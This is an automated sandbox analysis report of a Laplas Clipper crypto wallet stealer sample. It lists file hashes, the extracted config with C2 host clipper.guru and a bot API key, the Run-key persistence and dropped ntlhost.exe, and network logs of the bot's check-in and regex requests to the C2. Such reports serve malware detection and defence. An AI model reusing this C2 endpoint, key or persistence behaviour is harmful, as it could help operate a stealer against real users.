Analysis

  • max time kernel
    151s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20230703-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    25/07/2023, 01:27 UTC

General

  • Target

    4a1f597ed9fb89832e1182a9209d9a65453432e7a445e37c99cafd32963e429e.exe

  • Size

    1.8MB

  • MD5

    68732e21f497396296e93fb7277add61

  • SHA1

    1fdec6fc0ab4647491cb163a732d985bf6e75f16

  • SHA256

    4a1f597ed9fb89832e1182a9209d9a65453432e7a445e37c99cafd32963e429e

  • SHA512

    b3b2deb42b8c1362642ac725f24a3fc59eade40da1bf5e9f2a66e634ab8f7e3ad75a3eee65003be6532b808ad299ec293a9ceae024217a5de68aa41b61134305

  • SSDEEP

    49152:ZxP1ZMKdnhkmr5VlkA/azDEPKkb89KTYkr3T6:H1v9ViA/wkg9KTZ3T

Malware Config

Extracted

Family

laplas

C2

http://clipper.guru

Attributes
  • api_key

    0be23a6bec914a7d28f1aae995f036fdba93224093ddb48d02fe43e814862f4e

Signatures

  • Laplas Clipper

    Laplas is a crypto wallet stealer with three variants written in Golang, C#, and C++.

  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\4a1f597ed9fb89832e1182a9209d9a65453432e7a445e37c99cafd32963e429e.exe
    "C:\Users\Admin\AppData\Local\Temp\4a1f597ed9fb89832e1182a9209d9a65453432e7a445e37c99cafd32963e429e.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:1216
    • C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
      C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
      2⤵
      • Executes dropped EXE
      PID:4512

Network

  • flag-us
    DNS
    73.159.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    73.159.190.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    240.221.184.93.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    240.221.184.93.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    2.136.104.51.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    2.136.104.51.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    241.154.82.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    241.154.82.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    198.1.85.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    198.1.85.104.in-addr.arpa
    IN PTR
    Response
    198.1.85.104.in-addr.arpa
    IN PTR
    a104-85-1-198.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    208.194.73.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    208.194.73.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    clipper.guru
    ntlhost.exe
    Remote address:
    8.8.8.8:53
    Request
    clipper.guru
    IN A
    Response
    clipper.guru
    IN A
    185.209.161.61
  • flag-nl
    GET
    http://clipper.guru/bot/regex
    ntlhost.exe
    Remote address:
    185.209.161.61:80
    Request
    GET /bot/regex HTTP/1.1
    Host: clipper.guru
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Tue, 25 Jul 2023 01:28:27 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 633
    Connection: keep-alive
  • flag-nl
    GET
    http://clipper.guru/bot/online?key=0be23a6bec914a7d28f1aae995f036fdba93224093ddb48d02fe43e814862f4e&guid=MSXGLQPS\Admin
    ntlhost.exe
    Remote address:
    185.209.161.61:80
    Request
    GET /bot/online?key=0be23a6bec914a7d28f1aae995f036fdba93224093ddb48d02fe43e814862f4e&guid=MSXGLQPS\Admin HTTP/1.1
    Host: clipper.guru
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Tue, 25 Jul 2023 01:28:27 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 2
    Connection: keep-alive
  • flag-nl
    GET
    http://clipper.guru/bot/regex
    ntlhost.exe
    Remote address:
    185.209.161.61:80
    Request
    GET /bot/regex HTTP/1.1
    Host: clipper.guru
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Tue, 25 Jul 2023 01:29:27 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 633
    Connection: keep-alive
  • flag-nl
    GET
    http://clipper.guru/bot/online?key=0be23a6bec914a7d28f1aae995f036fdba93224093ddb48d02fe43e814862f4e&guid=MSXGLQPS\Admin
    ntlhost.exe
    Remote address:
    185.209.161.61:80
    Request
    GET /bot/online?key=0be23a6bec914a7d28f1aae995f036fdba93224093ddb48d02fe43e814862f4e&guid=MSXGLQPS\Admin HTTP/1.1
    Host: clipper.guru
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Tue, 25 Jul 2023 01:29:27 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 2
    Connection: keep-alive
  • flag-nl
    GET
    http://clipper.guru/bot/regex
    ntlhost.exe
    Remote address:
    185.209.161.61:80
    Request
    GET /bot/regex HTTP/1.1
    Host: clipper.guru
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Tue, 25 Jul 2023 01:30:28 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 633
    Connection: keep-alive
  • flag-nl
    GET
    http://clipper.guru/bot/online?key=0be23a6bec914a7d28f1aae995f036fdba93224093ddb48d02fe43e814862f4e&guid=MSXGLQPS\Admin
    ntlhost.exe
    Remote address:
    185.209.161.61:80
    Request
    GET /bot/online?key=0be23a6bec914a7d28f1aae995f036fdba93224093ddb48d02fe43e814862f4e&guid=MSXGLQPS\Admin HTTP/1.1
    Host: clipper.guru
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Tue, 25 Jul 2023 01:30:28 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 2
    Connection: keep-alive
  • flag-us
    DNS
    61.161.209.185.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    61.161.209.185.in-addr.arpa
    IN PTR
    Response
    61.161.209.185.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    157.123.68.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    157.123.68.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    www.microsoft.com
    Remote address:
    8.8.8.8:53
    Request
    www.microsoft.com
    IN A
    Response
    www.microsoft.com
    IN CNAME
    www.microsoft.com-c-3.edgekey.net
    www.microsoft.com-c-3.edgekey.net
    IN CNAME
    www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
    www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
    IN CNAME
    e13678.dscb.akamaiedge.net
    e13678.dscb.akamaiedge.net
    IN A
    104.85.1.163
  • flag-nl
    GET
    http://www.microsoft.com/pkiops/certs/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crt
    Remote address:
    104.85.1.163:80
    Request
    GET /pkiops/certs/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crt HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/10.0
    Host: www.microsoft.com
    Response
    HTTP/1.1 200 OK
    Content-Length: 1126
    Content-Type: application/octet-stream
    Content-MD5: YAUaFgF7vUODUG8XQQW6BQ==
    Last-Modified: Fri, 28 Sep 2018 22:50:05 GMT
    ETag: 0x8D62594BC0C84D8
    x-ms-request-id: 31bd8fcd-b01e-0028-1005-d530cf000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Unused62: 8096267
    X-EdgeConnect-Origin-MEX-Latency: 117
    Date: Tue, 25 Jul 2023 01:28:39 GMT
    Connection: keep-alive
    TLS_version: UNKNOWN
    ms-cv: CASMicrosoftCV1dbe2d93.0
    ms-cv-esi: CASMicrosoftCV1dbe2d93.0
    X-RTag: RT
  • flag-us
    DNS
    198.187.3.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    198.187.3.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    163.1.85.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    163.1.85.104.in-addr.arpa
    IN PTR
    Response
    163.1.85.104.in-addr.arpa
    IN PTR
    a104-85-1-163.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    57.169.31.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    57.169.31.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    161.252.72.23.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    161.252.72.23.in-addr.arpa
    IN PTR
    Response
    161.252.72.23.in-addr.arpa
    IN PTR
    a23-72-252-161.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    8.3.197.209.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    8.3.197.209.in-addr.arpa
    IN PTR
    Response
    8.3.197.209.in-addr.arpa
    IN PTR
    vip0x008.map2.ssl.hwcdn.net
  • flag-us
    DNS
    73.254.224.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    73.254.224.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    253.15.104.51.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    253.15.104.51.in-addr.arpa
    IN PTR
    Response
  • 185.209.161.61:80
    http://clipper.guru/bot/online?key=0be23a6bec914a7d28f1aae995f036fdba93224093ddb48d02fe43e814862f4e&guid=MSXGLQPS\Admin
    http
    ntlhost.exe
    1.5kB
    3.6kB
    14
    16

    HTTP Request

    GET http://clipper.guru/bot/regex

    HTTP Response

    200

    HTTP Request

    GET http://clipper.guru/bot/online?key=0be23a6bec914a7d28f1aae995f036fdba93224093ddb48d02fe43e814862f4e&guid=MSXGLQPS\Admin

    HTTP Response

    200

    HTTP Request

    GET http://clipper.guru/bot/regex

    HTTP Response

    200

    HTTP Request

    GET http://clipper.guru/bot/online?key=0be23a6bec914a7d28f1aae995f036fdba93224093ddb48d02fe43e814862f4e&guid=MSXGLQPS\Admin

    HTTP Response

    200

    HTTP Request

    GET http://clipper.guru/bot/regex

    HTTP Response

    200

    HTTP Request

    GET http://clipper.guru/bot/online?key=0be23a6bec914a7d28f1aae995f036fdba93224093ddb48d02fe43e814862f4e&guid=MSXGLQPS\Admin

    HTTP Response

    200
  • 104.85.1.163:80
    http://www.microsoft.com/pkiops/certs/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crt
    http
    418 B
    1.8kB
    5
    4

    HTTP Request

    GET http://www.microsoft.com/pkiops/certs/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crt

    HTTP Response

    200
  • 8.8.8.8:53
    73.159.190.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    73.159.190.20.in-addr.arpa

  • 8.8.8.8:53
    240.221.184.93.in-addr.arpa
    dns
    73 B
    144 B
    1
    1

    DNS Request

    240.221.184.93.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
    144 B
    1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    2.136.104.51.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    2.136.104.51.in-addr.arpa

  • 8.8.8.8:53
    241.154.82.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    241.154.82.20.in-addr.arpa

  • 8.8.8.8:53
    198.1.85.104.in-addr.arpa
    dns
    71 B
    135 B
    1
    1

    DNS Request

    198.1.85.104.in-addr.arpa

  • 8.8.8.8:53
    208.194.73.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    208.194.73.20.in-addr.arpa

  • 8.8.8.8:53
    clipper.guru
    dns
    ntlhost.exe
    58 B
    74 B
    1
    1

    DNS Request

    clipper.guru

    DNS Response

    185.209.161.61

  • 8.8.8.8:53
    61.161.209.185.in-addr.arpa
    dns
    73 B
    86 B
    1
    1

    DNS Request

    61.161.209.185.in-addr.arpa

  • 8.8.8.8:53
    157.123.68.40.in-addr.arpa
    dns
    72 B
    146 B
    1
    1

    DNS Request

    157.123.68.40.in-addr.arpa

  • 8.8.8.8:53
    www.microsoft.com
    dns
    63 B
    230 B
    1
    1

    DNS Request

    www.microsoft.com

    DNS Response

    104.85.1.163

  • 8.8.8.8:53
    198.187.3.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    198.187.3.20.in-addr.arpa

  • 8.8.8.8:53
    163.1.85.104.in-addr.arpa
    dns
    71 B
    135 B
    1
    1

    DNS Request

    163.1.85.104.in-addr.arpa

  • 8.8.8.8:53
    57.169.31.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    57.169.31.20.in-addr.arpa

  • 8.8.8.8:53
    161.252.72.23.in-addr.arpa
    dns
    72 B
    137 B
    1
    1

    DNS Request

    161.252.72.23.in-addr.arpa

  • 8.8.8.8:53
    8.3.197.209.in-addr.arpa
    dns
    70 B
    111 B
    1
    1

    DNS Request

    8.3.197.209.in-addr.arpa

  • 8.8.8.8:53
    73.254.224.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    73.254.224.20.in-addr.arpa

  • 8.8.8.8:53
    253.15.104.51.in-addr.arpa
    dns
    72 B
    146 B
    1
    1

    DNS Request

    253.15.104.51.in-addr.arpa

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

    Filesize

    593.6MB

    MD5

    a5b62feff7b3773f167cfa1598e657ae

    SHA1

    3131f8fc0854d0174e2d511f9a615da9de697fa3

    SHA256

    ccfe162b246bc3d9b867d0e97aca07dc9c0808b08cfdf545d189f0027de8d42f

    SHA512

    3227ecf1022b8e72474aca4f55c94aa4fd98dae31a01a8fea9da2d07f64798b5f22a7cfdcb16e6b8624f701a9dc7795e2e8f3099fc071dc1712f533f18c98b3a

  • C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

    Filesize

    519.2MB

    MD5

    534db06b1e6a69fa02884ad797860f32

    SHA1

    23924acd4b77fc6bf55761875ac33ce23ea987dd

    SHA256

    721ea543d4a35cd201aa0261305dfe2fba8725d1540f3fa4968691295fcbec50

    SHA512

    7bc0a67f84eb7f8f8ccb2c53966f20b036ef6122e8694abc54e12778eb9c8a8ee0aefa26fa25d5a0860f93c05d34f4e6ce9378eb3b865778f7cf0566cad41801

  • memory/1216-135-0x00000000042C0000-0x000000000446F000-memory.dmp

    Filesize

    1.7MB

  • memory/1216-136-0x00000000044A0000-0x0000000004870000-memory.dmp

    Filesize

    3.8MB

  • memory/1216-137-0x0000000000400000-0x0000000002606000-memory.dmp

    Filesize

    34.0MB

  • memory/1216-139-0x00000000042C0000-0x000000000446F000-memory.dmp

    Filesize

    1.7MB

  • memory/1216-140-0x0000000000400000-0x0000000002606000-memory.dmp

    Filesize

    34.0MB

  • memory/1216-141-0x00000000044A0000-0x0000000004870000-memory.dmp

    Filesize

    3.8MB

  • memory/1216-144-0x0000000000400000-0x0000000002606000-memory.dmp

    Filesize

    34.0MB

  • memory/4512-152-0x0000000000400000-0x0000000002606000-memory.dmp

    Filesize

    34.0MB

  • memory/4512-156-0x0000000000400000-0x0000000002606000-memory.dmp

    Filesize

    34.0MB

  • memory/4512-149-0x0000000000400000-0x0000000002606000-memory.dmp

    Filesize

    34.0MB

  • memory/4512-150-0x0000000000400000-0x0000000002606000-memory.dmp

    Filesize

    34.0MB

  • memory/4512-151-0x0000000004360000-0x0000000004511000-memory.dmp

    Filesize

    1.7MB

  • memory/4512-147-0x0000000004360000-0x0000000004511000-memory.dmp

    Filesize

    1.7MB

  • memory/4512-153-0x0000000000400000-0x0000000002606000-memory.dmp

    Filesize

    34.0MB

  • memory/4512-154-0x0000000000400000-0x0000000002606000-memory.dmp

    Filesize

    34.0MB

  • memory/4512-155-0x0000000000400000-0x0000000002606000-memory.dmp

    Filesize

    34.0MB

  • memory/4512-148-0x0000000004520000-0x00000000048F0000-memory.dmp

    Filesize

    3.8MB

  • memory/4512-157-0x0000000000400000-0x0000000002606000-memory.dmp

    Filesize

    34.0MB

  • memory/4512-159-0x0000000000400000-0x0000000002606000-memory.dmp

    Filesize

    34.0MB

  • memory/4512-160-0x0000000000400000-0x0000000002606000-memory.dmp

    Filesize

    34.0MB

  • memory/4512-161-0x0000000000400000-0x0000000002606000-memory.dmp

    Filesize

    34.0MB

  • memory/4512-162-0x0000000000400000-0x0000000002606000-memory.dmp

    Filesize

    34.0MB

  • memory/4512-163-0x0000000000400000-0x0000000002606000-memory.dmp

    Filesize

    34.0MB

  • memory/4512-164-0x0000000000400000-0x0000000002606000-memory.dmp

    Filesize

    34.0MB

  • memory/4512-165-0x0000000000400000-0x0000000002606000-memory.dmp

    Filesize

    34.0MB

  • memory/4512-166-0x0000000000400000-0x0000000002606000-memory.dmp

    Filesize

    34.0MB
